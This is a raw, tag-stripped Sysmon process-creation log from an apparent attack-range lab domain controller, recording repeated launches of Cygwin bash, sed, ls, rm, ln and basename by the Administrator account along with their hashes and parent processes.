14:56:03.381{A8622C2F-5403-6078-900C-00000000AE01}6580C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-8F0C-00000000AE01}7140C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.373{A8622C2F-5403-6078-8F0C-00000000AE01}7140C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058215Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.364{A8622C2F-5403-6078-8E0C-00000000AE01}3208C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-8D0C-00000000AE01}1536C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058205Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.356{A8622C2F-5403-6078-8D0C-00000000AE01}1536C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-8B0C-00000000AE01}3304C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.348{A8622C2F-5403-6078-8C0C-00000000AE01}5864C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-8B0C-00000000AE01}3304C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058183Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.340{A8622C2F-5403-6078-8B0C-00000000AE01}3304C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.331{A8622C2F-5403-6078-8A0C-00000000AE01}1496C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-890C-00000000AE01}4412C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.323{A8622C2F-5403-6078-890C-00000000AE01}4412C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-870C-00000000AE01}6808C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058151Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.315{A8622C2F-5403-6078-880C-00000000AE01}1800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-870C-00000000AE01}6808C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058139Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.307{A8622C2F-5403-6078-870C-00000000AE01}6808C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.299{A8622C2F-5403-6078-860C-00000000AE01}1028C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5403-6078-850C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058117Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.290{A8622C2F-5403-6078-850C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058105Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.282{A8622C2F-5403-6078-840C-00000000AE01}3220C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5403-6078-830C-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.274{A8622C2F-5403-6078-830C-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058085Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.266{A8622C2F-5403-6078-820C-00000000AE01}616C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-810C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058075Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.258{A8622C2F-5403-6078-810C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058065Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.249{A8622C2F-5403-6078-800C-00000000AE01}4568C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5403-6078-7F0C-00000000AE01}2408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058055Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.241{A8622C2F-5403-6078-7F0C-00000000AE01}2408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-7E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.232{A8622C2F-5403-6078-7E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.224{A8622C2F-5403-6078-7D0C-00000000AE01}928C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-7C0C-00000000AE01}1476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058023Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.215{A8622C2F-5403-6078-7C0C-00000000AE01}1476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-7A0C-00000000AE01}3176C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.207{A8622C2F-5403-6078-7B0C-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-7A0C-00000000AE01}3176C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.199{A8622C2F-5403-6078-7A0C-00000000AE01}3176C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057989Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.191{A8622C2F-5403-6078-790C-00000000AE01}4412C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-780C-00000000AE01}1800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057979Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.182{A8622C2F-5403-6078-780C-00000000AE01}1800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-760C-00000000AE01}4288C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057969Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.174{A8622C2F-5403-6078-770C-00000000AE01}6808C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-760C-00000000AE01}4288C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057957Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.166{A8622C2F-5403-6078-760C-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057945Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.159{A8622C2F-5403-6078-750C-00000000AE01}1408C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5403-6078-740C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057935Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.150{A8622C2F-5403-6078-740C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.142{A8622C2F-5403-6078-730C-00000000AE01}1736C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5403-6078-720C-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057913Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.134{A8622C2F-5403-6078-720C-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057903Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.126{A8622C2F-5403-6078-710C-00000000AE01}6884C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-700C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.118{A8622C2F-5403-6078-700C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057883Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.109{A8622C2F-5403-6078-6F0C-00000000AE01}4424C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5403-6078-6E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.101{A8622C2F-5403-6078-6E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-6D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.092{A8622C2F-5403-6078-6D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.084{A8622C2F-5403-6078-6C0C-00000000AE01}1476C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-6B0C-00000000AE01}6196C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.075{A8622C2F-5403-6078-6B0C-00000000AE01}6196C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.067{A8622C2F-5403-6078-6A0C-00000000AE01}4788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.059{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.050{A8622C2F-5403-6078-680C-00000000AE01}5184C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-670C-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.042{A8622C2F-5403-6078-670C-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.034{A8622C2F-5403-6078-660C-00000000AE01}4364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 